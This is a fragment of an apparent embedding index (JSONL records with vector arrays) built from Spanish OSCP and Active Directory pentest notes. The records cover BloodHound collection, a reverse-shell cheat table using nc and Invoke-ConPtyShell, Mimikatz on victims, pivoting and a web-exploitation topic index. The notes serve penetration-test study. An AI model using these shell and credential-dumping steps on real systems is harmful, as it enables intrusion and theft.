0.06573, -0.002, -0.00181, -0.01192, -0.01078, 0.03422, -0.01521, 0.03088, -0.03495, 0.01993, -0.01989, -0.0202, 0.0223, -0.10195, 0.06326, -0.03539, 0.018, 0.03888, -0.00276, 0.00684, 0.02306, -0.03742, -0.00941, 0.00404, -0.05361, 0.03398, -0.10734, 0.01653, 0.04399, 0.03313, 0.0056, -0.02055, 0.00639, 0.06949, 0.00389, 0.00553, -0.03029, -0.00121, -0.03598, 0.0445, 0.02936, 0.00538, 0.01251, -0.01525, 0.01996, 0.01468, -0.04037, -0.01055, -0.02387, -0.03713, 0.03903, -0.02861, -0.03984, 0.07873, -0.0082, -0.04038, 0.03265, -0.08182, 0.04375, 0.01893, 0.00701, 0.01836, 0.00127, -0.00092, -0.08753, 0.03613, -0.0003, -0.01755, -0.01931, -0.03487, 0.01028, 0.03417, 0.01854, -0.08489, -0.0326, 0.03346, -0.0335, 0.04199, -0.02799, -0.06908, 0.02307, -0.01935, -0.02848, -0.03036, 0.01553, 0.01387, 0.01183, 0.02044, -0.00846, 0.01521, 0.08318, 0.01693, -0.0693, -0.02922, -0.05057, 0.0053, -0.02127, 0.04351, -0.03636, -0.03363, -0.01846, 0.0112, -0.00311, -0.00976, 0.01173]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "# Neo4j (la BD que necesita BloodHound)\nsudo apt install -y neo4j\nsudo systemctl start neo4j\nsudo neo4j-admin set-initial-password 'BloodHound1!'\n```", "v": [-0.06293, -0.07289, -0.13792, -0.07173, -0.0366, -0.05611, -0.13465, -0.14113, -0.07253, 0.06343, -0.10781, -0.12887, -0.05356, -0.08953, -0.11682, -0.11349, -0.1224, -0.11182, 0.00938, 0.14827, -0.08899, 0.07949, -0.00161, 0.00884, 0.0069, 0.13673, 0.04928, 0.10524, -0.09548, -0.02452, -0.06519, -0.11306, 0.07234, -0.0205, -0.08721, -0.03846, 0.01085, -0.01547, -0.11566, 0.19812, 0.02547, 0.07819, -0.03516, 0.10373, 0.0291, -0.00098, -0.02524, -0.03011, 0.09674, -0.00961, 0.09387, 0.00377, -0.17095, -0.12226, 0.00684, -0.06037, 0.16037, -0.03375, -0.03048, -0.11046, -0.13806, -0.03588, 0.12859, 0.02466, -0.02125, -0.06568, -0.04208, -0.05245, -0.06221, 0.0768, -0.01981, 0.00165, -0.07065, -0.00106, -0.02682, -0.01269, 0.06611, -0.04239, 0.05291, -0.01493, -0.00163, 0.00678, 0.01957, -0.04461, -0.13107, -0.03478, 0.05725, -0.03093, -0.06154, 0.03501, 0.10219, -0.10607, 0.03462, -0.00174, 0.05198, -0.02313, 0.00653, 0.00967, 0.04174, -0.06804, -0.03329, 0.08127, -0.02478, 0.12328, 0.08021, -0.05316, -0.04639, -0.0581, 0.01312, -0.04221, 0.02744, 0.06191, -0.02356, -0.01042, 0.00558, -0.0607, -0.0017, 0.01173, 0.04474, -0.08264, -0.05819, -0.06084, 0.0015, 0.03589, -0.08353, -0.01115, -0.05707, 0.0748, -0.00502, -0.0594, 0.0104, -0.00424, 0.01304, 0.02389, -0.14438, 0.05216, 0.00772, -0.01594, -0.01675, -0.04936, -0.03407, -0.02872, 0.06447, -0.04972, 0.04009, 0.03622, 0.02858, -0.08224, -0.0296, 0.06525, 0.04458, 0.01332, -0.01233, -0.00146, -0.10295, -0.01778, 0.03731, -0.03802, 0.02318, 0.03133, 0.01846, -0.0376, -0.0267, 0.0587, -0.1479, 0.03378, -0.08214, -0.0226, -0.03517, -0.01171, -0.00985, -0.0159, -0.00269, 0.0014, 0.00477, -0.05762, 0.04042, -0.06992, 0.02198, -0.01047, -0.02086, 0.00861, -0.01206, -0.04192, -0.05926, -0.03318, -0.02989, -0.04014, 0.00917, 0.03467, 0.08405, 0.06694, 0.02307, -0.03092, -0.02227, 0.03061, -0.02188, -0.11104, -0.03236, 0.05397, -0.05136, 0.04572, -0.02718, -0.02731, -0.03691, 0.00403, -0.01766, 0.0684, -0.09641, 0.09352, 0.02874, -0.04199, 0.02656, -0.01713, -0.05038, -0.0692, 0.04907, 0.01382, -0.03589, -0.01573, 0.02915, 0.05522, 0.01043, -0.0294, -0.06504, -0.04981, 0.03531, -0.03821, 0.11663, -0.04919, -0.0664, 0.05052, 0.00342, -0.04417, 0.01885, -0.0006, 0.00626, -0.00489, -0.03353, 0.01656, 0.12267, 0.0625, -0.07407, -0.13768, -0.04068, -0.05776, -0.0375, 0.04363, 0.05283, 0.0462, 0.02667, 0.05146, 0.05448, 0.02867, -0.01345, -0.00469]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "# 1) Recolectar datos desde Kali (necesitas creds válidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "v": [0.0507, -0.25741, 0.05404, -0.01763, 0.00047, -0.15153, 0.01648, 0.02966, -0.09353, -0.00113, -0.03937, -0.14364, -0.02779, -0.07477, -0.13068, -0.05867, -0.06202, -0.02438, 0.00176, 0.01498, -0.05985, -0.0836, -0.06277, -0.01285, 0.03242, 0.16198, 0.02545, -0.01161, -0.04436, -0.00365, 0.01058, -0.06639, -0.12615, -0.01534, -0.04596, 0.13834, 0.03387, 0.13539, -0.017, 0.1016, -0.07985, 0.12851, 0.06503, 0.05523, -0.01337, 0.05399, 0.04993, 0.16116, 0.02977, -0.07492, -0.01032, -0.07068, -0.14936, -0.1077, -0.07361, 0.03719, 0.0914, 0.04975, 0.06525, -0.04248, 0.04749, -0.01954, 0.0236, 0.02123, 0.03246, -0.03327, 0.09953, -0.08507, -0.01379, 0.03811, -0.03447, 0.02179, 0.05384, 0.01569, 0.02474, -0.08373, 0.09486, -0.13286, 0.06447, 0.07844, -0.02393, 0.01057, 0.04062, -0.06764, -0.04363, -0.02877, 0.05115, 0.02105, 0.10767, 0.00025, -0.00861, -0.11029, 0.00349, 0.11033, 0.01671, 0.01548, -0.0745, 0.00826, -0.05405, 0.09632, -0.00468, -0.05221, -0.10421, 0.07084, 0.01427, 0.03488, -0.04075, 0.06059, 0.00439, 0.00603, 0.07162, -0.07178, -0.1072, 0.03081, -0.01699, -0.05549, -0.06326, -0.05489, 0.02083, 0.06085, 0.01887, 0.03078, 0.03717, -0.0884, -0.06576, -0.01893, -0.0617, 0.00768, -0.02377, -0.08653, -0.07643, 0.07239, 0.02228, 0.01164, 0.01697, 0.05467, 0.03582, -0.01167, 0.00551, -0.08897, -0.05659, -0.01397, 0.02067, -0.01965, 0.00338, 0.04105, 0.04687, -0.00657, -0.13979, 0.03734, 0.0376, 0.01103, 0.01794, -0.01163, -0.06702, 0.0466, 0.02464, -0.01524, -0.03666, 0.02067, 0.02127, 0.05456, 0.05932, -0.01276, -0.06194, 0.09678, 0.04114, 0.03271, 0.0396, -0.062, 0.01157, 0.01433, -0.01247, -0.02051, -0.00734, 0.00978, 0.14974, -0.09737, -0.13477, -0.02902, 0.06972, -0.07675, 0.0055, 0.04184, 0.06332, 0.01787, -0.01569, 0.05118, -0.01263, -0.10529, -0.0277, -0.01343, 0.08945, 0.03244, -0.0201, -0.02027, 0.08229, 0.02973, 0.02076, 0.02231, 0.02112, 0.03472, -0.01392, -0.02615, 0.07004, -0.02512, 0.04134, 0.01506, 0.02398, 0.01731, -0.00338, -0.00044, -0.04611, -0.05843, -0.04855, -0.17146, -0.01419, -0.00014, 0.02377, 0.00221, 0.03596, 0.01438, 0.02535, 0.08318, -0.03705, -0.03513, 0.04261, 0.00086, 0.10298, -0.00175, -0.02392, 0.08042, -0.05013, -0.00891, -0.0213, -0.00278, -0.00147, -0.00459, -0.06952, -0.01842, -0.08227, 0.09814, -0.00483, -0.09713, -0.03994, 0.02436, 0.06115, 0.01692, -0.05544, -0.05844, -0.01716, -0.10411, -0.03495, -0.11277, 0.07474, 0.09881]} +{"tipo": "metodologia", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/apuntes-ad-pentest.md", "texto": "## Resumen TL;DR\n\n| Pregunta | Respuesta |\n|---|---|\n| ¿Tengo GUI central? | **No**. Tu \"GUI\" es tener varios terminales abiertos. BloodHound es la única tool con GUI propia. |\n| ¿Reverse shell? | `nc` + `Invoke-ConPtyShell` desde la víctima. Lo recibes en `nc -lvnp 4444`. |\n| ¿Cómo envío datos? | **Subes** con `python3 -m http.server`. **Recibo** con `impacket-smbserver`. |\n| ¿Cómo pivoto? | `ligolo-ng` (proxy en Kali + agent en víctima). Una vez montado, las herramientas tiran por el túnel transparente. |\n| ¿BloodHound? | `apt install bloodhound bloodhound.py neo4j`. |\n| ¿Mimikatz? | Descargado en `tu carpeta`. Se ejecuta **en la víctima**, no en Kali. |\n| ¿Impacket? | Instalado a nivel sistema (`impacket-*`). Corre en Kali, habla con víctimas. |", "v": [-0.1154, -0.09384, 0.00719, 0.00137, 0.0875, -0.19729, -0.14967, -0.03733, 0.012, 0.04185, -0.08986, -0.09377, 0.06933, 0.02461, -0.1234, -0.0234, -0.16578, -0.07631, 0.12434, 0.00185, -0.09652, 0.04632, -0.1329, -0.0858, -0.00555, 0.1089, 0.07664, 0.07515, -0.10752, -0.01586, -0.04882, -0.18384, -0.03804, -0.0573, -0.08177, -0.05438, -0.00967, 0.04255, 0.07846, 0.24439, 0.03728, -0.00087, -0.03924, 0.09302, 0.09995, -0.13798, 0.05419, -0.04764, 0.11158, -0.00132, 0.00854, -0.04068, -0.21189, -0.12198, 0.00887, -0.05169, 0.12107, -0.02194, 0.11818, -0.05138, 0.02596, -0.02059, 0.02604, 0.06, 0.08434, -0.07253, 0.06598, -0.10331, -0.12397, 0.10056, -0.04343, -0.08559, 0.04195, 0.00192, -0.02234, -0.08661, 0.02747, -0.11718, 0.04316, 0.11069, -0.04567, -0.02111, -0.0603, -0.04617, -0.01575, -0.01203, 0.07402, -0.0418, 0.07324, -0.00455, 0.06798, -0.03457, 0.03282, 0.10375, 0.02411, -0.13479, -0.05475, -0.03791, 0.0421, -0.05933, 0.09745, 0.02432, -0.05073, 0.07409, 0.0914, -0.04455, -0.07696, 0.01334, -0.0483, -0.07216, 0.14594, 0.05683, 0.09868, 0.04944, -0.0427, -0.01743, 0.04982, 0.09783, 0.04176, -0.01562, 0.04315, 0.04001, -0.00664, 0.0189, -0.0423, -0.04424, -0.05498, 0.02509, -0.0145, -0.02941, 0.01419, 0.01516, 0.01342, -0.03087, 0.00418, 0.03711, 0.09256, -0.05026, 0.05731, 0.01165, -0.015, -0.01742, -0.00255, 0.07616, -0.01635, 0.03484, 0.0485, -0.11116, -0.01668, 0.01938, 0.11553, 0.02674, -0.01247, 0.00718, -0.02056, -0.09356, -0.01993, -0.02566, -0.08849, -0.00227, 0.0436, 0.0066, -0.01021, 0.03324, -0.04836, 0.01304, -0.00118, -0.01521, 0.03285, -0.03685, 0.0475, -0.02809, 0.02919, -0.00603, -0.04343, -0.08867, 0.06957, -0.07729, -0.07424, -0.00308, 0.07393, -0.01814, -0.01194, -0.00461, 0.01886, -0.02883, 0.02657, -0.03567, 0.00393, 0.01034, 0.00633, 0.04195, 0.05431, -0.03479, 0.0055, 0.02622, 0.03901, -0.04718, -0.05198, 0.0018, -0.06673, 0.03188, 0.03141, -0.05411, 0.0097, 0.00742, -0.06521, -0.00424, -0.02107, 0.01799, -0.00333, 0.01855, 0.04012, -0.01467, -0.01384, -0.04724, -0.04657, 0.05259, -0.02643, 0.01766, -0.06353, 0.00344, 0.02247, -0.00672, -0.02193, 0.02984, 0.02404, -0.01389, 0.0238, -0.0705, -0.01113, -0.00679, 0.0489, -0.0183, -0.05188, -0.025, -0.02603, 0.00492, -0.00555, -0.01363, 0.00321, 0.0457, -0.00937, -0.05396, -0.04875, 0.00718, 0.01537, -0.00575, -0.02271, -0.02971, -0.02703, -0.01428, -0.03684, -0.05484, -0.03209, -0.00507]} +{"tipo": "metodologia", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/OSCP MOC.md", "texto": "# 🗺️ OSCP — Mapa Central (MOC)\n\n> Nota hub del vault. Desde aquí salen todos los caminos.\n> Origen: apuntes propios en `tu carpeta` + material de un laboratorio.", "v": [0.0596, -0.11497, -0.0063, -0.13164, -0.16151, -0.249, 0.08203, 0.06401, -0.09654, -0.11979, -0.14303, -0.1436, 0.02971, 0.04788, 0.02733, 0.08946, 0.11458, -0.09447, -0.04692, -0.14419, -0.09332, 0.02753, -0.09213, 0.05277, -0.01091, -0.00777, 0.15113, -0.07497, -0.00945, 0.0279, 0.0179, 0.14604, 0.04793, -0.0033, -0.12994, -0.11508, 0.00079, -0.13073, 0.00327, 0.0845, -0.02859, 0.13679, -0.09227, 0.12536, 0.05347, -0.0655, 0.04422, 0.03375, -0.11133, -0.07597, -0.02442, -0.18372, -0.12532, -0.04238, -0.06706, 0.00707, 0.02375, 0.13184, 0.09849, -0.03941, 0.05883, 0.04532, -0.09546, -0.12821, 0.02854, -0.02472, -0.10796, -0.02334, -0.09162, 0.08305, -0.11438, 0.0615, 0.11677, -0.05058, 0.03335, -0.13813, 0.02023, -0.12665, 0.09851, 0.04644, -0.00111, 0.01119, 0.04677, -0.07144, 0.00424, -0.07875, 0.09983, 0.05429, -0.0537, -0.00165, 0.01884, 0.01531, -0.04823, 0.05165, 0.02174, -0.09302, -0.02621, -0.02031, 0.04213, -0.04521, -0.02065, 0.03147, 0.00811, 0.03143, 0.01302, 0.01918, 0.00687, -0.02245, 0.0233, 0.01302, 0.08763, 0.06496, 0.03675, 0.07066, -0.02967, 0.01979, 0.06048, 0.12517, -0.07061, -0.02592, -0.05396, 0.01689, -0.02994, -0.04771, 0.00982, 0.00555, 0.00644, -0.00565, 0.12358, 0.08457, -0.04494, -0.01945, -0.05469, -0.08142, 0.05243, -0.02312, -0.0527, -0.02542, 0.06966, 0.00339, 0.0414, -0.01162, 0.03147, -0.02929, 0.0305, 0.04908, -0.0053, -0.02242, -0.03743, 0.01067, -0.00826, 5e-05, 0.06291, -0.00997, 0.03364, 0.01268, 0.06808, 0.00496, -0.11016, 0.03118, 0.00876, 0.07231, -0.05203, 0.07339, -0.04903, -0.02328, 0.01993, 0.00707, -0.01185, 0.03677, -0.03511, 0.00574, -0.01073, -0.00582, 0.0154, -0.03999, 0.07141, -0.05161, 0.0257, 0.06552, -0.00357, -0.03523, 0.0256, 0.02121, 0.02638, 0.02722, 0.06385, 0.06388, 0.05048, -0.01916, -0.00308, -0.00021, -0.03622, 0.0131, -0.04483, -0.0349, 0.09011, -0.01544, -0.04568, 0.01184, -0.02951, 0.01403, 0.01363, -0.02024, 0.01536, -0.01827, -0.04288, -0.00789, -0.06501, 0.0362, 0.05441, -0.00836, 0.02125, -0.05528, 0.01297, 0.04496, -0.00664, 0.07603, -0.00603, -0.01234, 0.00059, 0.06505, 0.01627, 0.02983, 0.01097, 0.03732, -0.02376, 0.0216, 0.01056, -0.02514, 0.04568, 0.02884, 0.01337, -0.01238, 0.01162, 0.02629, -0.00555, 0.003, -0.03274, -0.0642, -0.00197, 0.05323, -0.0026, -0.03321, -0.04734, 0.00306, 0.01419, -0.0256, -0.04707, -0.02285, 0.04363, -0.10051, 0.0346, -0.04633, -0.05054, 0.01186]} +{"tipo": "metodologia", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/OSCP MOC.md", "texto": "## La espina dorsal\nLa Metodología OSCP es lo único que de verdad importa. Todo lo demás cuelga de ella:\n\n```\nEnumeración → vector → foothold (Reverse shell) →\nPrivesc Linux / Privesc Windows → loot (Mimikatz) →\nMovimiento lateral / Active Directory → documentar (Reporte OSCP)\n```", "v": [-0.14579, -0.08991, -0.08535, -0.1026, -0.08953, -0.14481, -0.03712, 0.00645, -0.06806, -0.04468, 0.05027, -0.07022, 0.05829, -0.08452, 0.08624, -0.06722, 0.16253, -0.10966, -0.06463, -0.15171, -0.18053, 0.03701, -0.16269, 0.00059, 0.2125, 0.04649, -0.02048, 0.0292, 0.08778, -0.06192, -0.06231, 0.11843, -0.04392, 0.01282, -0.01816, 0.04247, 0.03895, -0.20617, 0.06322, 0.20522, 0.12136, 0.0915, -0.02888, 0.18023, 0.04416, -0.15057, 0.052, 0.03576, 0.02779, -0.07221, -0.03657, -0.0046, -0.08614, -0.02528, -0.00799, -0.06537, 0.05772, -0.01001, 0.0448, 0.03199, -0.08079, 0.05687, -0.08271, -0.079, 0.07158, -0.11014, 0.00203, -0.05806, -0.09028, 0.02354, -0.02463, 0.11424, -0.0448, 0.00301, 0.05456, -0.03086, 0.02527, 0.07541, 0.16284, 0.11964, 0.00293, -0.01607, 0.04227, 0.03681, -0.08764, -0.15637, 0.05775, -0.00891, 0.04061, -0.10009, 0.08044, 0.04632, -0.12074, 0.01988, 0.07199, -0.06859, 0.01272, 0.06097, -0.10364, -0.0138, -0.03016, 0.05836, -0.03377, 0.07028, 0.04844, 0.06138, -0.00042, -0.07804, 0.01723, 0.0576, 0.04406, 0.06106, -0.02497, 0.00211, -0.06443, 0.05171, -0.11687, 0.00615, 0.01139, 0.01039, -0.01113, -0.02701, -0.02947, -0.04199, -0.00751, -0.08729, -0.09196, 0.09399, 0.01705, 0.02644, 0.0235, 0.00136, 0.02574, -0.0223, -0.02086, -0.04332, 0.01154, 0.00253, 0.05561, -0.04531, 0.03919, -0.02631, 0.02228, 0.00822, 0.04971, 0.01874, 0.00205, -0.01842, -0.00421, -0.03587, 0.01565, 0.063, 0.02973, -0.0558, 0.016, 0.00443, 0.07994, 0.01541, -0.07936, 0.01096, 0.08115, 0.03641, -0.04281, -0.0538, -0.0121, -0.06659, -0.00469, 0.03809, 0.00645, -0.05164, 0.00821, 0.05701, -0.02835, -0.05889, 0.03107, -0.105, -0.0169, -0.02723, 0.02547, 0.03898, 0.05883, 0.06048, 0.03898, -0.0354, 0.03564, -0.00181, -0.03792, 0.07397, 0.01092, 0.02697, 0.03246, -0.00509, 0.03291, -0.023, -0.02668, 0.0221, -0.00631, -0.02198, 0.09696, -0.02909, -0.05584, -0.02218, 0.01261, -0.00014, 0.07562, 0.00441, -0.03122, -0.00384, -0.00284, 0.0094, -0.03465, -0.00093, 0.05999, -0.00553, 0.00579, -0.00554, 0.02484, 0.05706, -0.02769, 0.01231, 0.02651, 0.04926, 0.03805, 0.03127, 0.015, 0.03687, 0.05072, -0.02557, -0.02307, -0.02488, -0.02113, 0.01466, 0.03483, -0.03036, 0.02149, 0.03695, 0.00146, 0.00425, 0.00246, -0.03407, -0.01771, -0.00131, 0.01979, -0.04543, -0.01862, -0.03741, -0.02787, 0.01547, 8e-05, -0.03988, 0.03367, -0.04587, -0.05296, -0.09062, 0.00449, 0.02744]} +{"tipo": "metodologia", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/OSCP MOC.md", "texto": "### 🧭 Metodología y examen\n- Metodología OSCP · Estructura del examen · Gestión del tiempo\n- Reporte OSCP · Reglas de herramientas", "v": [-0.10947, -0.09896, -0.01225, -0.31782, 0.00867, -0.12409, -0.03051, 0.09915, -0.0284, -0.00036, -0.14863, 0.04629, 0.01608, 0.00366, 0.0349, 0.06907, 0.12648, -0.05956, -0.16041, -0.04547, -0.12615, -0.0426, -0.12767, 0.15832, 0.07583, 0.10675, -0.04358, -0.07985, 0.02637, -0.01135, -0.01738, 0.13868, -0.00188, -0.11089, -0.1101, 0.05854, -0.05512, -0.05912, -0.058, 0.13394, -0.12256, -0.00087, -0.00436, 0.09614, 0.17205, -0.08037, 0.05039, 0.14148, -0.0985, -0.00432, -0.03611, -0.08924, -0.09158, -0.01934, -0.06777, -0.06844, 0.05731, 0.00923, 0.05875, -0.04366, 0.05263, 0.08557, -0.02893, -0.04912, 0.09732, -0.01865, 0.02386, -0.01322, -0.12704, 0.08758, -0.03354, -0.01532, -0.06592, 0.01634, 0.01214, -0.10849, -0.02469, 0.06936, 0.14725, -0.00457, -0.00403, -0.05746, -0.06327, 0.06858, -0.1179, -0.05995, 0.01222, -0.05872, -0.07687, -0.10847, -0.05228, -0.06049, 0.04788, 0.0131, 0.04921, -0.0543, 0.03783, 0.01696, 0.02605, -0.04153, 0.03985, 0.03038, 0.02402, 0.04692, -0.09138, 0.07367, 0.07605, -0.05195, 0.03637, -0.01766, -0.0139, 0.05594, -0.04246, 0.03534, -0.12114, -0.08898, 0.05984, 0.05733, -0.0623, -0.06383, 0.03104, 0.05123, -0.06164, 0.00755, 0.01561, -0.02855, 0.0814, 0.08089, 0.07522, -0.00354, -0.0038, 0.04787, -0.06746, 0.05629, 0.01478, -0.0313, -0.02708, -0.0264, 0.04116, -0.07125, -0.04538, 0.08906, -0.00557, -0.0405, 0.01883, -0.037, -0.00129, -0.10021, -0.09004, -0.04268, -0.00044, -0.01706, -0.01292, 0.07136, -0.07654, -0.09048, -0.04495, 0.01552, -0.02729, 0.03843, -0.00013, -0.0098, 0.0508, -0.00893, 0.0172, 0.05101, 0.04132, 0.01883, -0.02842, -0.06539, 0.03657, -0.00282, -0.03828, -0.0266, 0.033, -0.08255, 0.04233, -0.03728, -0.0463, -0.04966, -0.03185, 0.01651, -0.0352, -0.00095, 0.0313, 0.0204, 0.0187, 0.00458, 0.04966, 0.03463, 0.04432, -0.06138, -0.05006, -0.0153, -0.00068, 0.02761, 0.02328, -0.02899, 0.01265, -0.00671, -0.07644, -0.04037, 0.00872, -0.08278, -0.02514, 0.05204, 0.01594, 0.06266, -0.01603, -0.00497, -0.03785, -0.04166, 0.03999, -0.03705, 0.01943, -0.04008, -0.01832, 0.06203, -0.05836, 0.00122, 0.02348, 0.02362, 0.05809, 0.02552, -0.02559, 0.0295, -0.00255, 0.02004, 0.04103, -0.0139, 0.00235, -0.01496, 0.04443, -0.00117, 0.07845, -0.00034, 0.03461, -0.01925, -0.01646, -0.08071, 0.02282, 0.006, -0.00136, -0.02505, -0.10471, -0.04333, 0.01315, -0.04695, 0.04689, -0.08082, 0.00849, -0.04707, -0.01199, -0.03253, -0.01367, -0.02746]} +{"tipo": "metodologia", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/OSCP MOC.md", "texto": "### 🔍 Enumeración\n- Enumeración (índice) · Nmap · Nmap NSE · Puertos olvidados\n- SMB · SNMP · Netcat · RDP\n- Enumeración web · Content discovery · Vhosts y subdominios\n- searchsploit · Trampas de enumeración", "v": [-0.19349, -0.16252, -0.04814, -0.19211, 0.03388, -0.03854, -0.08131, -0.00371, -0.08009, 0.12543, -0.03512, -0.08486, 0.09189, -0.15069, -0.19635, 0.13014, -0.04076, -0.12434, 0.05807, 0.09139, -0.13563, 0.00865, -0.12857, 0.04219, 0.033, -0.00409, -0.18815, 0.12988, 0.04303, 0.05241, -0.08312, -0.05952, -0.0683, -0.02496, -0.10027, -0.14227, 0.10284, -0.1594, -0.04212, 0.02056, 0.05863, 0.10024, -0.10133, 0.06756, -0.07491, -0.04806, -0.07, -0.05559, 0.10716, -0.17794, -0.12846, 0.03406, -0.12124, -0.01664, -0.09385, 0.03015, 0.06609, -0.00805, -0.07003, 0.04286, 0.03081, -0.02897, 0.04848, -0.15238, -0.03419, -0.05404, 0.00876, 0.08323, -0.00908, 0.08255, 0.02328, -0.0083, 0.09249, -0.03458, 0.04989, -0.04161, 0.04818, -0.02487, 0.05414, 0.1097, 0.02449, -0.06037, -0.06377, 0.02733, -0.06483, -0.01246, 0.03617, -0.02131, 0.00838, -0.02742, 0.05271, 0.0507, 0.03284, 0.05626, -0.01649, -0.10598, -0.01187, 0.02029, 0.05321, -0.02383, 0.08064, 0.14236, -0.05456, -0.00516, 0.00978, 0.04732, 0.06462, 0.04439, -0.08747, 0.02322, 0.1348, -0.03321, -0.05618, -0.0331, -0.10503, -0.02338, -0.02373, 0.00824, 0.03518, -0.08975, 0.02088, 0.03962, -0.01793, 0.00201, -0.00368, 0.03082, 0.04495, -0.03299, 0.09392, -0.06904, 0.02894, -0.05166, -0.04103, -0.0125, -0.01186, -0.02786, -0.03402, 0.03899, 0.06622, 0.08335, -0.0039, -0.02409, -0.01329, 0.02047, -0.07678, 0.05945, 0.04823, -0.06834, -0.01286, 0.04908, 0.01007, -0.012, -0.06205, -0.03577, 0.0641, -0.07531, -0.05795, -0.03957, -0.09795, -0.00578, 0.00724, 0.00116, -0.01587, 0.06698, 0.03098, 0.04057, 0.02581, -0.00121, -0.0281, -0.05488, 0.0264, 0.01975, -0.03505, -0.07705, 0.00662, -0.04827, 0.01831, 0.01155, 0.0125, 0.01446, -0.00209, -0.06431, 0.02425, 0.014, -0.0068, -0.03274, 0.02764, -0.04004, -0.02886, -0.03981, -0.03191, -0.06939, -0.02513, -0.00026, 0.01661, 0.003, 0.04942, 0.02427, -0.05328, -0.02249, -0.02318, -0.0221, -0.02567, -0.02645, -0.00282, -0.01765, 0.01987, -0.02691, 0.01075, -0.05195, -0.01789, 0.04935, -0.03362, -0.02414, 0.00116, -0.06858, -0.05778, 0.08038, -0.02396, -0.00517, -0.03328, 0.02834, -0.00636, -0.00557, -0.026, -0.017, 0.00098, 0.01313, -0.01176, -0.05843, 0.03038, -0.06607, 0.02206, 0.00629, 0.02937, -0.04031, -0.04404, 0.06162, 0.01675, 0.07547, -0.04873, -0.04739, 0.03252, 0.01836, 0.01797, -0.0905, 0.0116, -0.0259, -0.00547, 0.03283, 0.00112, -0.04955, -0.03361, -0.02588, 0.00178, 0.01833]} +{"tipo": "metodologia", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/OSCP MOC.md", "texto": "### 🌐 Explotación web\n- Hacking web (índice/metodología) · Burp Suite · Burp Repeater e Intruder\n- SQL injection · Command injection · Directory traversal · LFI a RCE\n- File upload bypass · XSS · SSTI · Authentication attacks", "v": [-0.07659, -0.21729, -0.15094, -0.23211, 0.08325, -0.2307, -0.06622, -0.15185, 0.0394, 0.1979, -0.04017, -0.08438, 0.02776, -0.07866, -0.04042, -0.00227, -0.06907, -0.12307, -0.1039, -0.09313, 0.0791, 0.0806, -0.07981, 0.07983, 0.02695, 0.08028, -0.14025, 0.06874, -0.01757, -0.14346, -0.0843, -0.06972, -0.03283, 0.02878, -0.17071, -0.16723, -0.07827, 0.06917, -0.00888, 0.08373, -0.03285, 0.0522, -0.17729, 0.07394, 0.10997, -0.01613, 0.05328, 0.07588, 0.11851, -0.0135, 0.03332, -0.03759, -0.15151, 0.05591, -0.04459, -0.01359, 0.02276, -0.0778, -0.0683, -0.00899, 0.01587, 0.02233, -0.03928, -0.03722, 0.00759, -0.04953, 0.03463, -0.16317, -0.0037, 0.09161, -0.06335, -0.01574, 0.00203, -0.04456, 0.02573, -0.07448, 0.09688, 0.01692, 0.07154, 0.03125, -0.06353, -0.03349, -0.08709, 0.00928, -0.02559, 0.01459, 0.03464, -0.13031, -0.01988, -0.05208, 0.06765, -0.05189, -0.01785, 0.0231, 0.0564, -0.08036, -0.00415, -0.01989, 0.03281, -0.06192, 0.00403, -0.00512, -0.02013, 0.10479, 0.08368, 0.04336, 0.04227, 0.07071, -0.02946, -0.03147, 0.05225, -0.03368, -0.05495, -0.10276, -0.01741, -0.02395, 0.00286, 0.05585, -0.00897, -0.04095, -0.12698, -0.01594, -0.02055, 0.05749, -0.05671, -0.04636, -0.08581, -0.00818, -0.03016, -0.02822, -0.04371, -0.01567, 0.05193, 0.06353, -0.04253, -0.01199, 0.01548, -0.0382, -0.04129, -0.0089, -0.0202, -0.00528, 0.00403, 0.02502, -0.03215, 0.03542, 0.05322, -0.07539, -0.03543, -0.02389, 0.01047, 0.03837, 0.02823, 0.01765, 0.02532, -0.06604, 0.01354, -0.03564, -0.02505, 0.07476, 0.01083, 0.04969, -0.00967, 0.0695, -0.0214, 0.02799, 0.00785, -0.01368, -0.02627, 0.00189, 0.03529, 0.099, -0.0109, -0.07318, 0.03347, -0.00716, 0.01265, -0.11534, 0.09169, -0.06002, 0.01461, -0.00327, 0.00646, 0.0464, -0.0063, -0.08307, -0.01023, 0.06757, -0.02079, 0.01316, -0.01663, -0.01955, 0.00113, 0.02764, 0.02339, -0.00664, -0.01819, -0.04711, 0.02301, -0.06213, -0.03245, -0.0096, -0.05515, -0.06923, -0.01377, 0.00429, 0.01379, -0.01385, -0.04651, -0.02322, -0.02634, -0.02082, 0.01239, -0.03882, -0.01488, -0.06212, -0.00316, 0.01953, -0.04172, -0.00521, -0.04538, 0.03267, 0.07033, -0.0336, 0.01323, 0.0169, -0.02443, -0.07958, 0.00028, -0.02122, 0.0071, -0.02499, -0.02505, 0.0413, 0.06239, 0.03836, -0.04524, 0.0211, -0.04059, -0.02031, 0.0346, 0.00787, 0.00058, -0.01046, -0.02715, -0.04226, -0.05923, -0.00302, 0.01702, -0.00549, -0.00588, 0.01009, -0.04915, -0.01336, -0.0566, -0.00804]} +{"tipo": "metodologia", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/OSCP MOC.md", "texto": "### 🐚 Shells y transferencia\n- Puesto de mando Kali · Reverse shell · Estabilizar shell TTY\n- Egress filtering · Transferencia de ficheros", "v": [-0.12279, -0.09417, -0.13801, -0.06485, 0.0821, -0.04728, -0.01732, -0.02852, 0.14263, 0.09485, -0.17766, 0.12451, -0.00839, -0.09143, 0.13936, 0.10718, -0.04061, -0.03057, -0.00362, -0.03224, -0.0593, -0.03532, -0.09876, -0.10463, 0.05674, 0.16927, -0.10883, 0.00402, -0.09829, 0.01379, 0.13389, -0.04143, 0.04411, -0.06141, 0.00771, 0.0304, -0.0522, -0.00794, -0.00958, 0.05537, 